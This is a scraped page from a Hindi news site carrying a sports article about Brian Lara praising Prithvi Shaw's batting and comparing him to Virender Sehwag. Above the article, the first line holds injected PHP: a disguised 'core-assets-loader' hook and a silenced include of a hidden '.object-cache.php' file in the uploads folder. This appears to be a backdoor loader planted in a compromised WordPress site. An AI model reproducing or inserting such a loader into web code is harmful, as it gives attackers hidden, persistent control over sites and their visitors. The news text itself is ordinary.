add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ब्रायन लारा को पृथ्वी शॉ में दिखती है इस विस्फोटक बल्लेबाज की झलक – SOCH INDIA
Menu

खेल
ब्रायन लारा को पृथ्वी शॉ में दिखती है इस विस्फोटक बल्लेबाज की झलक

nobanner

19 साल के युवा क्रिकेटर पृथ्वी शॉ (Prithvi Shaw) की प्रतिभा पर लगातार चर्चा हो रही है. भारत में उनके प्रशंसक करोड़ों में हैं. अब इन प्रशंसकों में वेस्टइंडीज के महान बल्लेबाज ब्रायन लारा (Brian Lara) का नाम भी जुड़ गया है, जिन्हें मुंबई के इस बल्लेबाज की बल्लेबाजी शैली में ‘वीरेंद्र सहवाग’ की झलक नजर आती है. पृथ्वी शॉ आईपीएल में दिल्ली की टीम के लिए खेलते हैं.

वीरेंद्र सहवाग की तरह पृथ्वी शॉ भी गेंद को कट करने में माहिर हैं और उनके शार्ट-आर्म पुल में पूरी तरह से ‘नजफगढ़ के नवाब’ की छवि नजर आती है. खेल के महानतम खिलाड़ियों में से एक लारा ने युवा पृथ्वी की जमकर तारीफ की. पृथ्वी शॉ इस लीग के मौजूदा सीजन में छह मैचों में 28.16 की औसत से 169 रन बना चुके हैं. उनका सर्वोच्च स्कोर 99 रन है, जो उन्होंने कोलकाता की टीम के खिलाफ बनाया था. दिल्ली की टीम ने यह मैच टाई होने के बाद सुपर ओवर में जीता था.